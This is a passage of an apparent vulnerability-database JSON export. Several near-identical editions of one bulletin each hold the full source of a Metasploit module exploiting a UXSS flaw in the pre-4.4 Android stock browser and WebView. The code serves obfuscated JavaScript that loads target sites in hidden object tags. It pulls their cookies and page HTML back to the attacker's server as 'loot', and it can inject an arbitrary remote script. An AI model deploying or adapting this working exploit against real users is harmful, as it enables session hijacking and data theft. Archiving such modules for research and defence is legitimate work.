collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-19T15:26:34", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-09T17:46:48", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-09T17:46:48", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-09T19:47:12", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-09T19:47:12", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "6e872c0bb2ab042e21a220e7df9966e5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-24T21:27:18", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-24T21:27:18", "differentElements": ["modified", "published"], "edition": 60}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-24T23:27:42", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310704388", "OPENVAS:1361412562310704387", "OPENVAS:1361412562310843904", "OPENVAS:1361412562310814670", "OPENVAS:1361412562310843903", "OPENVAS:1361412562310875445", "OPENVAS:1361412562310843901"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2D06CECA2192DFF0EED67EAC5413CB11"]}, {"type": "securelist", "idList": ["SECURELIST:067DB0A9978063CEC1E7506882CBB27E"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG"]}], "modified": "2018-09-24T23:27:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-24T23:27:42", "differentElements": ["modified", "published"], "edition": 61}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "6e872c0bb2ab042e21a220e7df9966e5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-12T08:43:30", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310704388", "OPENVAS:1361412562310704387", "OPENVAS:1361412562310843904", "OPENVAS:1361412562310843903", "OPENVAS:1361412562310875445", "OPENVAS:1361412562310814670", "OPENVAS:1361412562310843901"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2D06CECA2192DFF0EED67EAC5413CB11"]}, {"type": "securelist", "idList": ["SECURELIST:067DB0A9978063CEC1E7506882CBB27E"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG"]}], "modified": "2019-02-12T08:43:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-12T08:43:30", "differentElements": ["modified", "published"], "edition": 62}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This 